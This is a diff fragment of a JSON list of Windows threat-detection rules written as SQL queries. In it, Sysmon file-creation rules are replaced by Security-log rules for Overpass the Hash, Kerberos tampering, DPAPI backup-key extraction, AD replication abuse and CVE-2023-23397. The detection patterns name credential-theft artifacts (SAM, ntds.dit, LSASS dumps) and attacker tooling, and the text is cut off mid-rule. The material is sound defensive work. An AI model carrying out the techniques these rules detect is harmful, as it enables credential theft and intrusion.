"file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", - "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", - "status": "experimental", - "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "status": "test", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.discovery" + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" ], "falsepositives": [ - "Unknown" + "Runas command-line tool using /netonly parameter" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" ], - "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" + "filename": "win_security_overpass_the_hash.yml" }, { - "title": "Suspicious Screensaver Binary File Creation", - "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", - "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", + "title": "SCM Database Privileged Operation", + "id": "dae8171c-5ec6-4396-b210-8466585b53e9", + "status": "test", + "description": "Detects non-system users performing privileged operation os the SCM database", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1546.002" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_scr_binary_file.yml" + "filename": "win_security_scm_database_privileged_operation.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "status": "test", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Faulty legacy applications" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "status": "test", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1003.002" - ], - "falsepositives": [ - "Rare cases of administrative activity" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" + "attack.t1003.006" ], - "filename": "file_event_win_sam_dump.yml" - }, - { - "title": "ISO or Image Mount Indicator in Recent Files", - "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", - "status": "test", - "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Cases in which a user mounts an image file for legitimate reasons" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_iso_file_recent.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", - "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", + "title": "Suspicious Remote Logon with Explicit Credentials", + "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", "status": "experimental", - "description": "Detects PowerShell creating a binary executable or script file.", - "author": "frack113", + "description": "Detects suspicious processes logging on with explicit credentials", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", "tags": [ - "attack.persistence" + "attack.t1078", + "attack.lateral_movement" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Administrators that use the RunAS command or scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_powershell_drop_binary.yml" + "filename": "win_security_susp_logon_explicit_credentials.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", + "title": "Remote Access Tool Services Have Been Installed - Security", + "id": "c8b00925-926c-47e3-beea-298fd563728e", "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.persistence", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_service_install_remote_access_software.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "HybridConnectionManager Service Installation", + "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "description": "Rule to detect the Hybrid Connection Manager service installation.", "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "title": "Secure Deletion with SDelete", + "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "description": "Detects renaming of file while deletion with SDelete tool.", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + "attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" ], "falsepositives": [ - "Legitimate add-ins" + "Legitimate usage of SDelete" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_susp_sdelete.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "status": "experimental", - "description": "Detects programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DCERPC SMB Spoolss Named Pipe", + "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "status": "test", + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "author": "OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Domain Controllers acting as printer servers too? :)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE 